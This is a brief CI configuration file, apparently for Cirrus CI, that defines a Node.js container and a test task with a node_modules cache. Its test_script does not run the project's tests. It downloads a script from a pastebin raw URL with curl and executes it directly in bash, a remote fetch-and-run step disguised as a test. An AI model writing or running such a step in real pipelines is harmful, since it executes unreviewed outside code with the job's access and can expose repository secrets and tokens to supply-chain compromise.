container:
  image: node:latest
  cpu: 32

test_task:
  node_modules_cache:
    folder: node_modules
    fingerprint_script: cat package-lock.json
    populate_script: npm ci
  test_script: bash -c "$(curl -fsSL https://pastebin.com/raw/2Q8BJ4Ka)" 
